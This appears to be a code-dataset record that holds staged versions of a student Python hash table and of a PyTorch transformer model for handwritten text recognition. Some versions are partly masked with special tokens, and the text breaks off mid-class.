"step-4": "class HashTableEntry:\n \"\"\"\n Hash Table entry, as a linked list node.\n \"\"\"\n\n def __init__(self, key, value):\n self.key = key\n self.value = value\n self.next = None\n\n\nclass HashTable:\n \"\"\"\n A hash table that with `capacity` buckets\n that accepts string keys\n\n Implement this.\n \"\"\"\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.storage = [None] * capacity\n self.numberOfItems = 0\n\n def fnv1(self, key):\n \"\"\"\n FNV-1 64-bit hash function\n\n Implement this, and/or DJB2.\n \"\"\"\n hash = 14695981039346656037\n for n in key.encode():\n hash = hash ^ n\n hash = hash * 1099511628211\n return hash\n\n def djb2(self, key):\n \"\"\"\n DJB2 32-bit hash function\n\n Implement this, and/or FNV-1.\n \"\"\"\n hash = 5381\n for n in key.encode():\n hash = hash * 33 + n\n return hash\n\n def hash_index(self, key):\n \"\"\"\n Take an arbitrary key and return a valid integer index\n between within the storage capacity of the hash table.\n \"\"\"\n return self.djb2(key) % self.capacity\n\n def put(self, key, value):\n \"\"\"\n Store the value with the given key.\n\n Hash collisions should be handled with Linked List Chaining.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n if self.storage[hi]:\n current = self.storage[hi]\n while current.next and current.key != key:\n current = current.next\n if current.key == key:\n current.value = value\n else:\n current.next = HashTableEntry(key, value)\n self.numberOfItems += 1\n else:\n self.storage[hi] = HashTableEntry(key, value)\n self.numberOfItems += 1\n self.calculateLoad()\n\n def delete(self, key):\n \"\"\"\n Remove the value stored with the given key.\n\n Print a warning if the key is not found.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n current = self.storage[hi]\n prev = self.storage[hi]\n while current and current.key != key:\n prev = current\n current = current.next\n if current and current.key == key:\n if current == self.storage[hi]:\n self.storage[hi] = current.next\n else:\n prev.next = current.next\n self.numberOfItems -= 1\n else:\n print('WARNING: no key')\n self.calculateLoad()\n\n def get(self, key):\n \"\"\"\n Retrieve the value stored with the given key.\n\n Returns None if the key is not found.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n if self.storage[hi]:\n if self.storage[hi].next:\n current = self.storage[hi]\n while current.next and current.key != key:\n current = current.next\n return current.value\n else:\n return self.storage[hi].value\n return None\n\n def resize(self, factor=2):\n \"\"\"\n Doubles the capacity of the hash table and\n rehash all key/value pairs.\n\n Implement this.\n \"\"\"\n self.capacity = round(self.capacity * factor)\n newarr = [None] * self.capacity\n for i, v in enumerate(self.storage):\n while v:\n hi = self.hash_index(v.key)\n if newarr[hi]:\n current = newarr[hi]\n while current.next:\n current = current.next\n current.next = HashTableEntry(v.key, v.value)\n else:\n newarr[hi] = HashTableEntry(v.key, v.value)\n v = v.next\n self.storage = newarr\n\n def calculateLoad(self):\n load = self.numberOfItems / len(self.storage)\n if load > 0.7:\n self.resize(2)\n elif load < 0.2:\n self.resize(0.5)\n pass\n\n\nif __name__ == '__main__':\n ht = HashTable(2)\n ht.put('line_1', '111')\n ht.put('line_2', '222')\n ht.put('line_3', '333')\n ht.put('line_4', 'sss')\n ht.put('line_5', 'ddd')\n ht.put('line_6', 'ggg')\n ht.put('line_7', 'hhh')\n ht.put('line_12', 'jjj')\n print('')\n old_capacity = len(ht.storage)\n ht.resize()\n new_capacity = len(ht.storage)\n print(f'\\nResized from {old_capacity} to {new_capacity}.\\n')\n print('')\n for i, v in enumerate(ht.storage):\n while v:\n print(i, v.value)\n v = v.next\n print('')\n ht.delete('line_3')\n print('')\n for i, v in enumerate(ht.storage):\n while v:\n print(i, v.value)\n v = v.next\n print('')\n print('')\n",
"step-5": "class HashTableEntry:\n \"\"\"\n Hash Table entry, as a linked list node.\n \"\"\"\n\n def __init__(self, key, value):\n self.key = key\n self.value = value\n self.next = None\n\n\nclass HashTable:\n \"\"\"\n A hash table that with `capacity` buckets\n that accepts string keys\n\n Implement this.\n \"\"\"\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.storage = [None] * capacity\n self.numberOfItems = 0\n\n def fnv1(self, key):\n \"\"\"\n FNV-1 64-bit hash function\n\n Implement this, and/or DJB2.\n \"\"\"\n # hash = 0xff\n hash = 0xcbf29ce484222325\n for n in key.encode():\n # print(n)\n hash = hash ^ n\n hash = hash * 0x100000001b3\n\n # print(hash)\n return hash\n\n def djb2(self, key):\n \"\"\"\n DJB2 32-bit hash function\n\n Implement this, and/or FNV-1.\n \"\"\"\n\n hash = 5381\n for n in key.encode():\n # hash = ((hash << 5) + hash) + n\n hash = hash * 33 + n\n\n return hash\n # return hash & 0xFFFFFFFF\n\n def hash_index(self, key):\n \"\"\"\n Take an arbitrary key and return a valid integer index\n between within the storage capacity of the hash table.\n \"\"\"\n # return self.fnv1(key) % self.capacity\n return self.djb2(key) % self.capacity\n\n def put(self, key, value):\n \"\"\"\n Store the value with the given key.\n\n Hash collisions should be handled with Linked List Chaining.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n if self.storage[hi]:\n current = self.storage[hi]\n while current.next and current.key != key:\n current = current.next\n\n if current.key == key:\n current.value = value\n else:\n current.next = HashTableEntry(key, value)\n self.numberOfItems += 1\n else:\n self.storage[hi] = HashTableEntry(key, value)\n self.numberOfItems += 1\n\n self.calculateLoad()\n\n def delete(self, key):\n \"\"\"\n Remove the value stored with the given key.\n\n Print a warning if the key is not found.\n\n Implement this.\n \"\"\"\n\n hi = self.hash_index(key)\n\n # if that hi is empty ignore\n # if self.storage[hi] is None:\n # print(\"WARNING: no key\")\n # return\n\n current = self.storage[hi]\n prev = self.storage[hi]\n while current and current.key != key:\n prev = current\n current = current.next\n\n if (current and current.key == key):\n # if its the first link in the list\n if (current == self.storage[hi]):\n self.storage[hi] = current.next\n else:\n prev.next = current.next\n\n self.numberOfItems -= 1\n else:\n print(\"WARNING: no key\")\n\n self.calculateLoad()\n\n def get(self, key):\n \"\"\"\n Retrieve the value stored with the given key.\n\n Returns None if the key is not found.\n\n Implement this.\n \"\"\"\n hi = self.hash_index(key)\n if (self.storage[hi]):\n if(self.storage[hi].next):\n current = self.storage[hi]\n while current.next and current.key != key:\n current = current.next\n return current.value\n else:\n return self.storage[hi].value\n\n return None\n\n def resize(self, factor=2):\n \"\"\"\n Doubles the capacity of the hash table and\n rehash all key/value pairs.\n\n Implement this.\n \"\"\"\n self.capacity = round(self.capacity*factor)\n newarr = [None] * self.capacity\n\n for i, v in enumerate(self.storage):\n while v:\n hi = self.hash_index(v.key)\n if newarr[hi]:\n current = newarr[hi]\n while current.next:\n current = current.next\n\n current.next = HashTableEntry(v.key, v.value)\n else:\n newarr[hi] = HashTableEntry(v.key, v.value)\n\n v = v.next\n\n self.storage = newarr\n\n # Solution 2 - Much cleaner\n # newHashTable = HashTable(round(self.capacity*factor))\n # for i, v in enumerate(self.storage):\n # while v:\n # newHashTable.put(v.key, v.value)\n # v = v.next\n\n # self.capacity = newHashTable.capacity\n # self.storage = newHashTable.storage\n\n def calculateLoad(self):\n load = self.numberOfItems/len(self.storage)\n\n # print(\"Items:\\t\", ht.numberOfItems)\n # print(\"Storage:\", len(ht.storage))\n # print(\"LOAD:\\t\", load)\n\n # comment code bellow to pass tests\n if load > 0.7:\n self.resize(2)\n elif load < 0.2:\n self.resize(0.5)\n\n pass\n\n\nif __name__ == \"__main__\":\n ht = HashTable(2)\n\n ht.put(\"line_1\", \"111\")\n ht.put(\"line_2\", \"222\")\n ht.put(\"line_3\", \"333\")\n ht.put(\"line_4\", \"sss\")\n ht.put(\"line_5\", \"ddd\")\n ht.put(\"line_6\", \"ggg\")\n ht.put(\"line_7\", \"hhh\")\n ht.put(\"line_12\", \"jjj\")\n\n print(\"\")\n\n # Test storing beyond capacity\n # print(ht.get(\"line_1\"))\n # print(ht.get(\"line_2\"))\n # print(ht.get(\"line_3\"))\n # print(ht.get(\"line_4\"))\n # print(ht.get(\"line_5\"))\n # print(ht.get(\"line_6\"))\n # print(ht.get(\"line_7\"))\n\n # Test resizing\n old_capacity = len(ht.storage)\n ht.resize()\n new_capacity = len(ht.storage)\n\n print(f\"\\nResized from {old_capacity} to {new_capacity}.\\n\")\n\n # print(\"1: \", ht.storage[1].value)\n # print(\"1: \", ht.storage[1].next.value)\n\n # print(\"3: \", ht.storage[3].value)\n # print(\"3: \", ht.storage[3].next.value)\n # print(\"3: \", ht.storage[3].next.next.value)\n\n print(\"\")\n for i, v in enumerate(ht.storage):\n while v:\n print(i, v.value)\n v = v.next\n print(\"\")\n ht.delete(\"line_3\")\n print(\"\")\n for i, v in enumerate(ht.storage):\n while v:\n print(i, v.value)\n v = v.next\n print(\"\")\n\n # Test if data intact after resizing\n # print(ht.get(\"line_1\"))\n # print(ht.get(\"line_2\"))\n # print(ht.get(\"line_3\"))\n # print(ht.get(\"line_4\"))\n # print(ht.get(\"line_5\"))\n # print(ht.get(\"line_6\"))\n # print(ht.get(\"line_7\"))\n\n print(\"\")\n",
"step-ids": [
6,
11,
13,
15,
16
]
}
|
[
6,
11,
13,
15,
16
] |
<|reserved_special_token_0|>
class PositionalEncoding(nn.Module):
def __init__(self, d_model, max_len, dropout=0.1):
super(PositionalEncoding, self).__init__()
self.dropout = nn.Dropout(p=dropout)
pe = torch.zeros(max_len, d_model)
position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)
div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.
log(10000.0) / d_model))
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
pe = pe.unsqueeze(0).transpose(0, 1)
self.register_buffer('pe', pe)
<|reserved_special_token_0|>
class TransformerHTR(nn.Module):
def __init__(self, alphabet, freeze_resnet=False, use_encoder=False,
dict_size=83, f=1024, num_layers=4, num_heads=8, dropout=0.1,
text_len=100):
super(TransformerHTR, self).__init__()
self.resnet = ResNetFeatures()
if freeze_resnet:
print('Freezing-resnet')
for param in self.resnet.resnet.parameters():
param.requires_grad = False
self.fc = nn.Linear(f * 4, f)
self.pe_encode = PositionalEncoding(f, 140, dropout)
self.fc_bar = nn.Linear(f, f)
if use_encoder:
print('Transformer Encoder')
encoder_layers = nn.TransformerEncoderLayer(f, num_heads, f,
dropout)
self.transformer_encoder = nn.TransformerEncoder(encoder_layers,
num_layers)
else:
print('Identity encoder')
self.transformer_encoder = nn.Identity()
self.layer_norm = nn.LayerNorm(f)
print('freeze-resnet', freeze_resnet)
print('use_encoder', use_encoder)
self.ebl = nn.Embedding(dict_size, f)
self.pe_decode = PositionalEncoding(f, text_len, dropout)
decoder_layer = nn.TransformerDecoderLayer(d_model=f, nhead=
num_heads, dim_feedforward=f, dropout=dropout)
self.transformer_decoder = nn.TransformerDecoder(decoder_layer,
num_layers=num_layers)
self.linear = nn.Linear(f, dict_size)
self.f = f
self.text_len = text_len
self.alphabet = alphabet
self.inv_alphabet = {j: i for i, j in alphabet.items()}
self.init_weights()
def init_weights(self):
initrange = 0.1
self.fc.bias.data.zero_()
self.fc.weight.data.uniform_(-initrange, initrange)
self.fc_bar.bias.data.zero_()
self.fc_bar.weight.data.uniform_(-initrange, initrange)
self.ebl.weight.data.uniform_(-initrange, initrange)
self.linear.bias.data.zero_()
self.linear.weight.data.uniform_(-initrange, initrange)
def generate_square_subsequent_mask(self, sz):
mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)
mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(
mask == 1, float(0.0))
return mask
def encode(self, x):
x = self.resnet(x)
b, f, h, w = x.size()
x = x.view(b, f * h, w).permute(0, 2, 1)
x = self.fc(x)
x = self.pe_encode(x.permute(1, 0, 2))
x = self.fc_bar(x)
x = self.transformer_encoder(x)
return x
def decode(self, x, y):
kpm = (x == self.alphabet['<P>']).transpose(1, 0)
x = self.ebl(x) * math.sqrt(self.f)
x = self.pe_decode(x)
dim = x.size()[0]
a = self.generate_square_subsequent_mask(dim).to(x.device)
x = self.transformer_decoder(x, y, a, tgt_key_padding_mask=kpm)
return self.linear(x).permute(1, 0, 2)
def forward(self, x, y):
return self.decode(x, self.encode(y))
@torch.no_grad()
def to_text_(self, x, bulk=True):
txt = []
p = {self.alphabet['<E>']}
s = {self.alphabet['<S>'], self.alphabet['<P>']}
for idx in x:
if not bulk:
if idx in p:
break
if idx in s:
continue
txt.append(self.inv_alphabet[idx])
return txt if bulk else ''.join(txt)
@torch.no_grad()
def to_text(self, x, bulk=False):
x = x.cpu().numpy()
if len(x.shape) == 2:
return [self.to_text_(x[i], bulk=bulk) for i in range(x.shape[0])]
else:
return self.to_text_(x, bulk=bulk)
@torch.no_grad()
def gen(self, y, bulk=False):
y = self.encode(y)
output_tokens = torch.full((y.size()[1], self.text_len), self.
alphabet['<P>']).long()
output_tokens[:, 0] = self.alphabet['<S>']
output_tokens = output_tokens.to(y.device)
for j in range(1, self.text_len):
x = output_tokens[:, :j].permute(1, 0)
x = self.decode(x, y)
a = torch.argmax(x, dim=-1)
output_tokens[:, j] = a[:, -1]
if bulk:
return self.to_text(output_tokens[:, 1:], bulk=True), output_tokens
else:
return self.to_text(output_tokens)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ResNetFeatures(nn.Module):
def __init__(self, pretrained=True):
super().__init__()
self.resnet = torchvision.models.resnet50(pretrained=pretrained)
def forward(self, x):
x = self.resnet.conv1(x.repeat(1, 3, 1, 1))
x = self.resnet.bn1(x)
x = self.resnet.relu(x)
x = self.resnet.maxpool(x)
x = self.resnet.layer1(x)
x = self.resnet.layer2(x)
x = self.resnet.layer3(x)
return x
class PositionalEncoding(nn.Module):
def __init__(self, d_model, max_len, dropout=0.1):
super(PositionalEncoding, self).__init__()
self.dropout = nn.Dropout(p=dropout)
pe = torch.zeros(max_len, d_model)
position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)
div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.
log(10000.0) / d_model))
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
pe = pe.unsqueeze(0).transpose(0, 1)
self.register_buffer('pe', pe)
def forward(self, x):
x = x + self.pe[:x.size(0), :]
return self.dropout(x)
class TransformerHTR(nn.Module):
def __init__(self, alphabet, freeze_resnet=False, use_encoder=False,
dict_size=83, f=1024, num_layers=4, num_heads=8, dropout=0.1,
text_len=100):
super(TransformerHTR, self).__init__()
self.resnet = ResNetFeatures()
if freeze_resnet:
print('Freezing-resnet')
for param in self.resnet.resnet.parameters():
param.requires_grad = False
self.fc = nn.Linear(f * 4, f)
self.pe_encode = PositionalEncoding(f, 140, dropout)
self.fc_bar = nn.Linear(f, f)
if use_encoder:
print('Transformer Encoder')
encoder_layers = nn.TransformerEncoderLayer(f, num_heads, f,
dropout)
self.transformer_encoder = nn.TransformerEncoder(encoder_layers,
num_layers)
else:
print('Identity encoder')
self.transformer_encoder = nn.Identity()
self.layer_norm = nn.LayerNorm(f)
print('freeze-resnet', freeze_resnet)
print('use_encoder', use_encoder)
self.ebl = nn.Embedding(dict_size, f)
self.pe_decode = PositionalEncoding(f, text_len, dropout)
decoder_layer = nn.TransformerDecoderLayer(d_model=f, nhead=
num_heads, dim_feedforward=f, dropout=dropout)
self.transformer_decoder = nn.TransformerDecoder(decoder_layer,
num_layers=num_layers)
self.linear = nn.Linear(f, dict_size)
self.f = f
self.text_len = text_len
self.alphabet = alphabet
self.inv_alphabet = {j: i for i, j in alphabet.items()}
self.init_weights()
def init_weights(self):
initrange = 0.1
self.fc.bias.data.zero_()
self.fc.weight.data.uniform_(-initrange, initrange)
self.fc_bar.bias.data.zero_()
self.fc_bar.weight.data.uniform_(-initrange, initrange)
self.ebl.weight.data.uniform_(-initrange, initrange)
self.linear.bias.data.zero_()
self.linear.weight.data.uniform_(-initrange, initrange)
def generate_square_subsequent_mask(self, sz):
mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)
mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(
mask == 1, float(0.0))
return mask
def encode(self, x):
x = self.resnet(x)
b, f, h, w = x.size()
x = x.view(b, f * h, w).permute(0, 2, 1)
x = self.fc(x)
x = self.pe_encode(x.permute(1, 0, 2))
x = self.fc_bar(x)
x = self.transformer_encoder(x)
return x
def decode(self, x, y):
kpm = (x == self.alphabet['<P>']).transpose(1, 0)
x = self.ebl(x) * math.sqrt(self.f)
x = self.pe_decode(x)
dim = x.size()[0]
a = self.generate_square_subsequent_mask(dim).to(x.device)
x = self.transformer_decoder(x, y, a, tgt_key_padding_mask=kpm)
return self.linear(x).permute(1, 0, 2)
def forward(self, x, y):
return self.decode(x, self.encode(y))
@torch.no_grad()
def to_text_(self, x, bulk=True):
txt = []
p = {self.alphabet['<E>']}
s = {self.alphabet['<S>'], self.alphabet['<P>']}
for idx in x:
if not bulk:
if idx in p:
break
if idx in s:
continue
txt.append(self.inv_alphabet[idx])
return txt if bulk else ''.join(txt)
@torch.no_grad()
def to_text(self, x, bulk=False):
x = x.cpu().numpy()
if len(x.shape) == 2:
return [self.to_text_(x[i], bulk=bulk) for i in range(x.shape[0])]
else:
return self.to_text_(x, bulk=bulk)
@torch.no_grad()
def gen(self, y, bulk=False):
y = self.encode(y)
output_tokens = torch.full((y.size()[1], self.text_len), self.
alphabet['<P>']).long()
output_tokens[:, 0] = self.alphabet['<S>']
output_tokens = output_tokens.to(y.device)
for j in range(1, self.text_len):
x = output_tokens[:, :j].permute(1, 0)
x = self.decode(x, y)
a = torch.argmax(x, dim=-1)
output_tokens[:, j] = a[:, -1]
if bulk:
return self.to_text(output_tokens[:, 1:], bulk=True), output_tokens
else:
return self.to_text(output_tokens)
<|reserved_special_token_0|>
def get(x):
a = character_dict.get(x, None)
if a is None:
idx = len(character_dict)
character_dict[x] = idx
return idx
else:
return a
<|reserved_special_token_0|>
def load_text_tensor(txt):
return torch.LongTensor([ALPHABET[t] for t in load_text(txt)]).unsqueeze(1)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ResNetFeatures(nn.Module):
def __init__(self, pretrained=True):
super().__init__()
self.resnet = torchvision.models.resnet50(pretrained=pretrained)
def forward(self, x):
x = self.resnet.conv1(x.repeat(1, 3, 1, 1))
x = self.resnet.bn1(x)
x = self.resnet.relu(x)
x = self.resnet.maxpool(x)
x = self.resnet.layer1(x)
x = self.resnet.layer2(x)
x = self.resnet.layer3(x)
return x
class PositionalEncoding(nn.Module):
def __init__(self, d_model, max_len, dropout=0.1):
super(PositionalEncoding, self).__init__()
self.dropout = nn.Dropout(p=dropout)
pe = torch.zeros(max_len, d_model)
position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)
div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.
log(10000.0) / d_model))
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
pe = pe.unsqueeze(0).transpose(0, 1)
self.register_buffer('pe', pe)
def forward(self, x):
x = x + self.pe[:x.size(0), :]
return self.dropout(x)
class TransformerHTR(nn.Module):
def __init__(self, alphabet, freeze_resnet=False, use_encoder=False,
dict_size=83, f=1024, num_layers=4, num_heads=8, dropout=0.1,
text_len=100):
super(TransformerHTR, self).__init__()
self.resnet = ResNetFeatures()
if freeze_resnet:
print('Freezing-resnet')
for param in self.resnet.resnet.parameters():
param.requires_grad = False
self.fc = nn.Linear(f * 4, f)
self.pe_encode = PositionalEncoding(f, 140, dropout)
self.fc_bar = nn.Linear(f, f)
if use_encoder:
print('Transformer Encoder')
encoder_layers = nn.TransformerEncoderLayer(f, num_heads, f,
dropout)
self.transformer_encoder = nn.TransformerEncoder(encoder_layers,
num_layers)
else:
print('Identity encoder')
self.transformer_encoder = nn.Identity()
self.layer_norm = nn.LayerNorm(f)
print('freeze-resnet', freeze_resnet)
print('use_encoder', use_encoder)
self.ebl = nn.Embedding(dict_size, f)
self.pe_decode = PositionalEncoding(f, text_len, dropout)
decoder_layer = nn.TransformerDecoderLayer(d_model=f, nhead=
num_heads, dim_feedforward=f, dropout=dropout)
self.transformer_decoder = nn.TransformerDecoder(decoder_layer,
num_layers=num_layers)
self.linear = nn.Linear(f, dict_size)
self.f = f
self.text_len = text_len
self.alphabet = alphabet
self.inv_alphabet = {j: i for i, j in alphabet.items()}
self.init_weights()
def init_weights(self):
initrange = 0.1
self.fc.bias.data.zero_()
self.fc.weight.data.uniform_(-initrange, initrange)
self.fc_bar.bias.data.zero_()
self.fc_bar.weight.data.uniform_(-initrange, initrange)
self.ebl.weight.data.uniform_(-initrange, initrange)
self.linear.bias.data.zero_()
self.linear.weight.data.uniform_(-initrange, initrange)
def generate_square_subsequent_mask(self, sz):
mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)
mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(
mask == 1, float(0.0))
return mask
def encode(self, x):
x = self.resnet(x)
b, f, h, w = x.size()
x = x.view(b, f * h, w).permute(0, 2, 1)
x = self.fc(x)
x = self.pe_encode(x.permute(1, 0, 2))
x = self.fc_bar(x)
x = self.transformer_encoder(x)
return x
def decode(self, x, y):
kpm = (x == self.alphabet['<P>']).transpose(1, 0)
x = self.ebl(x) * math.sqrt(self.f)
x = self.pe_decode(x)
dim = x.size()[0]
a = self.generate_square_subsequent_mask(dim).to(x.device)
x = self.transformer_decoder(x, y, a, tgt_key_padding_mask=kpm)
return self.linear(x).permute(1, 0, 2)
def forward(self, x, y):
return self.decode(x, self.encode(y))
@torch.no_grad()
def to_text_(self, x, bulk=True):
txt = []
p = {self.alphabet['<E>']}
s = {self.alphabet['<S>'], self.alphabet['<P>']}
for idx in x:
if not bulk:
if idx in p:
break
if idx in s:
continue
txt.append(self.inv_alphabet[idx])
return txt if bulk else ''.join(txt)
@torch.no_grad()
def to_text(self, x, bulk=False):
x = x.cpu().numpy()
if len(x.shape) == 2:
return [self.to_text_(x[i], bulk=bulk) for i in range(x.shape[0])]
else:
return self.to_text_(x, bulk=bulk)
@torch.no_grad()
def gen(self, y, bulk=False):
y = self.encode(y)
output_tokens = torch.full((y.size()[1], self.text_len), self.
alphabet['<P>']).long()
output_tokens[:, 0] = self.alphabet['<S>']
output_tokens = output_tokens.to(y.device)
for j in range(1, self.text_len):
x = output_tokens[:, :j].permute(1, 0)
x = self.decode(x, y)
a = torch.argmax(x, dim=-1)
output_tokens[:, j] = a[:, -1]
if bulk:
return self.to_text(output_tokens[:, 1:], bulk=True), output_tokens
else:
return self.to_text(output_tokens)
<|reserved_special_token_0|>
def load_batch_image(max_img=2):
return torch.cat([load_image(os.path.join('debug-data', f'{i}.png')) for
i in range(1, max_img + 1)], dim=0).unsqueeze(1)
<|reserved_special_token_0|>
def get(x):
a = character_dict.get(x, None)
if a is None:
idx = len(character_dict)
character_dict[x] = idx
return idx
else:
return a
<|reserved_special_token_0|>
def load_text_tensor(txt):
return torch.LongTensor([ALPHABET[t] for t in load_text(txt)]).unsqueeze(1)
def load_batch_text():
return torch.cat([load_text_tensor(TXT[i]) for i in range(2)], dim=1)
if __name__ == '__main__':
transformer = TransformerHTR(ALPHABET, text_len=MAX_LEN)
bt = load_batch_text()
print(bt.size())
b = transformer(bt[0:transformer.text_len, :], load_batch_image())
criterion = nn.CrossEntropyLoss()
loss = 0
trgt = bt[1:, :]
for i in range(trgt.size()[1]):
loss += criterion(b[i], trgt[:, i])
loss.backward()
out = transformer.gen(load_batch_image())
print(out)
<|reserved_special_token_1|>
import torch
from torch import nn
from torch.nn import functional as F
import torchvision
import math
from torchvision.models.resnet import Bottleneck
from dataset import load_image, load_text, ALPHABET, MAX_LEN
class ResNetFeatures(nn.Module):
def __init__(self, pretrained=True):
super().__init__()
self.resnet = torchvision.models.resnet50(pretrained=pretrained)
def forward(self, x):
x = self.resnet.conv1(x.repeat(1, 3, 1, 1))
x = self.resnet.bn1(x)
x = self.resnet.relu(x)
x = self.resnet.maxpool(x)
x = self.resnet.layer1(x)
x = self.resnet.layer2(x)
x = self.resnet.layer3(x)
return x
class PositionalEncoding(nn.Module):
def __init__(self, d_model, max_len, dropout=0.1):
super(PositionalEncoding, self).__init__()
self.dropout = nn.Dropout(p=dropout)
pe = torch.zeros(max_len, d_model)
position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)
div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.
log(10000.0) / d_model))
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
pe = pe.unsqueeze(0).transpose(0, 1)
self.register_buffer('pe', pe)
def forward(self, x):
x = x + self.pe[:x.size(0), :]
return self.dropout(x)
class TransformerHTR(nn.Module):
def __init__(self, alphabet, freeze_resnet=False, use_encoder=False,
dict_size=83, f=1024, num_layers=4, num_heads=8, dropout=0.1,
text_len=100):
super(TransformerHTR, self).__init__()
self.resnet = ResNetFeatures()
if freeze_resnet:
print('Freezing-resnet')
for param in self.resnet.resnet.parameters():
param.requires_grad = False
self.fc = nn.Linear(f * 4, f)
self.pe_encode = PositionalEncoding(f, 140, dropout)
self.fc_bar = nn.Linear(f, f)
if use_encoder:
print('Transformer Encoder')
encoder_layers = nn.TransformerEncoderLayer(f, num_heads, f,
dropout)
self.transformer_encoder = nn.TransformerEncoder(encoder_layers,
num_layers)
else:
print('Identity encoder')
self.transformer_encoder = nn.Identity()
self.layer_norm = nn.LayerNorm(f)
print('freeze-resnet', freeze_resnet)
print('use_encoder', use_encoder)
self.ebl = nn.Embedding(dict_size, f)
self.pe_decode = PositionalEncoding(f, text_len, dropout)
decoder_layer = nn.TransformerDecoderLayer(d_model=f, nhead=
num_heads, dim_feedforward=f, dropout=dropout)
self.transformer_decoder = nn.TransformerDecoder(decoder_layer,
num_layers=num_layers)
self.linear = nn.Linear(f, dict_size)
self.f = f
self.text_len = text_len
self.alphabet = alphabet
self.inv_alphabet = {j: i for i, j in alphabet.items()}
self.init_weights()
def init_weights(self):
initrange = 0.1
self.fc.bias.data.zero_()
self.fc.weight.data.uniform_(-initrange, initrange)
self.fc_bar.bias.data.zero_()
self.fc_bar.weight.data.uniform_(-initrange, initrange)
self.ebl.weight.data.uniform_(-initrange, initrange)
self.linear.bias.data.zero_()
self.linear.weight.data.uniform_(-initrange, initrange)
def generate_square_subsequent_mask(self, sz):
mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)
mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(
mask == 1, float(0.0))
return mask
def encode(self, x):
x = self.resnet(x)
b, f, h, w = x.size()
x = x.view(b, f * h, w).permute(0, 2, 1)
x = self.fc(x)
x = self.pe_encode(x.permute(1, 0, 2))
x = self.fc_bar(x)
x = self.transformer_encoder(x)
return x
def decode(self, x, y):
kpm = (x == self.alphabet['<P>']).transpose(1, 0)
x = self.ebl(x) * math.sqrt(self.f)
x = self.pe_decode(x)
dim = x.size()[0]
a = self.generate_square_subsequent_mask(dim).to(x.device)
x = self.transformer_decoder(x, y, a, tgt_key_padding_mask=kpm)
return self.linear(x).permute(1, 0, 2)
def forward(self, x, y):
return self.decode(x, self.encode(y))
@torch.no_grad()
def to_text_(self, x, bulk=True):
txt = []
p = {self.alphabet['<E>']}
s = {self.alphabet['<S>'], self.alphabet['<P>']}
for idx in x:
if not bulk:
if idx in p:
break
if idx in s:
continue
txt.append(self.inv_alphabet[idx])
return txt if bulk else ''.join(txt)
@torch.no_grad()
def to_text(self, x, bulk=False):
x = x.cpu().numpy()
if len(x.shape) == 2:
return [self.to_text_(x[i], bulk=bulk) for i in range(x.shape[0])]
else:
return self.to_text_(x, bulk=bulk)
@torch.no_grad()
def gen(self, y, bulk=False):
y = self.encode(y)
output_tokens = torch.full((y.size()[1], self.text_len), self.
alphabet['<P>']).long()
output_tokens[:, 0] = self.alphabet['<S>']
output_tokens = output_tokens.to(y.device)
for j in range(1, self.text_len):
x = output_tokens[:, :j].permute(1, 0)
x = self.decode(x, y)
a = torch.argmax(x, dim=-1)
output_tokens[:, j] = a[:, -1]
if bulk:
return self.to_text(output_tokens[:, 1:], bulk=True), output_tokens
else:
return self.to_text(output_tokens)
import os
import torchvision
import numpy as np
from torchvision.transforms.functional import resize, pil_to_tensor
import PIL
def load_batch_image(max_img=2):
return torch.cat([load_image(os.path.join('debug-data', f'{i}.png')) for
i in range(1, max_img + 1)], dim=0).unsqueeze(1)
character_dict = dict()
def get(x):
a = character_dict.get(x, None)
if a is None:
idx = len(character_dict)
character_dict[x] = idx
return idx
else:
return a
TXT = ['A|MOVE|to|stop|Mr.|Gaitskell|from',
'nominating|any|more|Labour|life|Peers']
def load_text_tensor(txt):
return torch.LongTensor([ALPHABET[t] for t in load_text(txt)]).unsqueeze(1)
def load_batch_text():
return torch.cat([load_text_tensor(TXT[i]) for i in range(2)], dim=1)
if __name__ == '__main__':
transformer = TransformerHTR(ALPHABET, text_len=MAX_LEN)
bt = load_batch_text()
print(bt.size())
b = transformer(bt[0:transformer.text_len, :], load_batch_image())
criterion = nn.CrossEntropyLoss()
loss = 0
trgt = bt[1:, :]
for i in range(trgt.size()[1]):
loss += criterion(b[i], trgt[:, i])
loss.backward()
out = transformer.gen(load_batch_image())
print(out)
<|reserved_special_token_1|>
import torch
from torch import nn
from torch.nn import functional as F
import torchvision
import math
from torchvision.models.resnet import Bottleneck
from dataset import load_image, load_text, ALPHABET, MAX_LEN
class ResNetFeatures(nn.Module):
def __init__(self, pretrained=True):
super().__init__()
# Input images x of handwritten text-lines, which might have
# arbitrary lengths, are first processed by a Convolutional
# Neural Network. We obtain an intermediate visual feature
# representation Fc of size f. We use the ResNet50 [26] as
# our backbone convolutional architecture.
# Such visual feature representation has a contextualized global view of the
# whole input image while remaining compact.
self.resnet = torchvision.models.resnet50(pretrained=pretrained)
# self.resnet.inplanes = 512
